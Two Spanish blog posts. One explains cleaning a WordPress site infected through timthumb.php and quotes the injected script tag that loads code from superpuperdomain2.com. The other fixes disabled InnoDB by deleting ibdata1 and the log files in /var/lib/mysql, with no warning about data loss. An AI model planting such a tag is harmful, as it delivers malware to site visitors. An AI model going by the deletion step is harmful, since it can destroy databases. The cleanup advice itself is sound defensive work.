Vulnerabilidad en WordPress Superpuperdomain2.com

Vulnerabilidad en timthumb.php

Sintomas

Lo más probable es que cuando quieras entrar al sitio, tu antivirus, o tu navegador te avisen de que tu sitio esta cargando contenido de superpuperdomain2.com y éste es un sitio maligno. Sino, fijate el codigo fuente de tu web, y al final debes tener algo asi:

<script language=”javascript” SRC=”http://superpuperdomain2.com/count.php?ref=”&gt;

¿Cómo solucionarlo?

Primero, el codigo malicioso, fue insertado en el index.php  de tu blog. Lo debes borrar de ahi.

En segundo lugar, corrige el problema para que no vuelva a suceder…  descarga la ultima version de timthum.php antes de reemplazarlo por el existente en tu theme, hazle los siguientes cambios:

Cambia define( ‘ALLOW_EXTERNAL’, TRUE);  por  define( ‘ALLOW_EXTERNAL’, false);

Y tambien cambia ésto:

$allowedSites = array ( ‘flickr.com’,
‘picasa.com’,
‘img.youtube.com’,
‘upload.wikimedia.org’,
);

Por ésto:

$allowedSites = array();

Para encontrar todos los timthumb.php que puedes tener, (uno por theme, aunque no todos lo usan) pudes hacer desde la consola:
find . | grep timthumb.php

 

Reparar InnoDB en Ubuntu…

Errores con InnoDB en Ubuntu

Muchas veces, nos encontramos queriendo hacer una Tabla para una Base de datos  MYSQL en Ubuntu con claves foraneas, y nos damos por sorpresa que InnoDB no esta activado.

Lo primero que cualquier persona hace es: Google–> ¿Como activar InnoDB en Ubuntu?    a lo que Google responde… que hay que editar el archio de configuracion, comentando la linea que dice Skip-InnoDB, y reiniciando el servicio de mysql…

PERO AVECES, ESO NO FUNCIONA, como lo fue en mi caso  Mysql, sigue iniciando con InnoDB desactivado!

Ni siquiera ningun mensaje de error me tira…

el problema radica en  los logs de InnoDB. al iniciar de forma incorrecta, se genera un LOG CORRUPTO, que sencillamente, no deja que se inicie InnoDB.

solucion:

ir hasta la carpeta:

<strong>/var/lib/mysql</strong>

y eliminar por completo los siguientes archivos:

<strong>ibdata1 </strong>
<strong>ib_logfile0</strong>
<strong> ib_logfile1</strong>

despues reinicias mysql con la siguiente linea:

<strong>sudo /etc/init.d/mysql start</strong>

Y LISTO ahora InnoDB va a funcionar perfectamente!